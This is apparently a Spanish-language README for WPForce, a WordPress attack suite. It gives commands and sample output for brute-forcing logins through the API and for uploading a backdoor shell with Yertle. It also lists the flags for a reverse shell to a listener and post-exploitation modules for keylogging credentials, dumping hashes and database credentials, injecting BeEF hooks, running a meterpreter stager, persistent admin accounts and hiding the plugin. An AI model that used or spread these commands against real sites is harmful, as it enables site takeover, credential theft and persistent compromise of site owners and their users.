
Suite de Ataques a Wordpress
WPForce es un conjunto de herramientas de ataque a WordPress. Actualmente contiene 2 scripts: WPForce, que fuerza bruta inicios de sesión a través de la API, y Yertle, que sube shells una vez que se han encontrado credenciales de administrador. Yertle también contiene varios módulos de post-explotación.
Para más información, visita el artículo del blog aquí: https://www.n00py.io/2017/03/squeezing-the-juice-out-of-a-compromised-wordpress-server/
Blogs en otros idiomas:
Chino - www.mottoin.com/100381.html
Portugués - http://www.100security.com.br/wpforce/
Español - http://www.1024megas.com/2017/05/wpforce-fuerzabruta-postexplotacion.html
https://esgeeks.com/como-hackear-sitio-wordpress-con-wpforce/
Ruso - https://hackware.ru/?p=2547
Francés - https://securityhack3r.info/wpforce-brute-force-attack-tool-wordpress/
Turco - http://turkhackteam.org/web-server-guvenligi/1655005-wordpress-site-sizma-testi-part-1-a.html
Yertle requiere la librería requests para ejecutarse.
http://docs.python-requests.org/en/master/user/install/
python wpforce.py -i usr.txt -w pass.txt -u "http://www.[sitio].com"
,-~~-.___. __ __ ____ _____
/ | x \ \ \ / /| _ \ | ___|___ _ __ ___ ___
( ) 0 \ \ /\ / / | |_) || |_ / _ \ | '__|/ __|/ _ \.
\_/-, ,----' ____ \ V V / | __/ | _|| (_) || | | (__| __/
==== || \_ \_/\_/ |_| |_| \___/ |_| \___|\___|
/ \-'~; || |
/ __/~| ...||__/|-" Herramienta de Ataque de Fuerza Bruta para WordPress
=( _____||________| ~n00py~
Lista de Usuarios: usr.txt (3)
Lista de Contraseñas: pass.txt (21)
URL: http://www[sitio].com
--------------------------
[[email protected] : xxxxxxxxxxxxx] ¡son credenciales válidas! - ESTA CUENTA ES ADMIN
--------------------------
--------------------------
[[email protected] : xxxxxxxxxxxx] ¡son credenciales válidas!
--------------------------
100% Completo
Todos los pares correctos:
{'[email protected]': 'xxxxxxxxxxxxx', '[email protected]': 'xxxxxxxxxxxxx'}
-h, --help muestra este mensaje de ayuda y sale
-i INPUT, --input INPUT
Nombre del archivo de entrada
-w WORDLIST, --wordlist WORDLIST
Nombre del archivo de lista de palabras
-u URL, --url URL URL del objetivo
-v, --verbose Salida detallada. Muestra los intentos a medida que ocurren.
-t THREADS, --threads THREADS
Determina el número de hilos a usar, por defecto es 10
-a AGENT, --agent AGENT
Determina el user-agent
-d, --debug Esta opción se usa para determinar problemas con el script.
python yertle.py -u "[usuario]" -p "[contraseña]" -t "http://www.[sitio].com" -i
_..---.--. __ __ _ _
.'\ __|/O.__) \ \ / /__ _ __| |_| | ___
/__.' _/ .-'_\ \ V / _ \ '__| __| |/ _ \.
(____.'.-_\____) | | __/ | | |_| | __/
(_/ _)__(_ \_)\_ |_|\___|_| \__|_|\___|
(_..)--(.._)'--' ~n00py~
Módulo de Post-explotación para WordPress
¡Backdoor subido!
Directorio de Subida: ebwhbas
os-shell>
-h, --help muestra este mensaje de ayuda y sale
-i, --interactive Shell de comandos interactiva
-r, --reverse Shell inverso
-t TARGET, --target TARGET
URL del objetivo
-u USERNAME, --username USERNAME
Nombre de usuario administrador
-p PASSWORD, --password PASSWORD
Contraseña de administrador
-li IP, --ip IP IP del oyente
-lp PORT, --port PORT
Puerto del oyente
-v, --verbose Salida detallada.
-e EXISTING, --existing EXISTING
Omite subir un shell y se conecta al shell existente
Yertle actualmente contiene estos módulos:
Comandos Principales
====================
Comando Descripción
------- -----------
? Menú de ayuda
beef Inyecta un hook de BeEF en el sitio web
dbcreds Muestra las credenciales de la base de datos
exit Termina la sesión
hashdump Extrae todos los hashes de contraseñas de WordPress
help Menú de ayuda
keylogger Parchea el núcleo de WordPress para registrar credenciales en texto plano
keylog Muestra el archivo de keylog
meterpreter Ejecuta un stager de PHP meterpreter para conectarse a metasploit
persist Crea una cuenta de administrador que se volverá a agregar a sí misma
quit Termina la sesión
shell Envía un shell inverso TCP a un oyente netcat
stealth Oculta Yertle de la página de plugins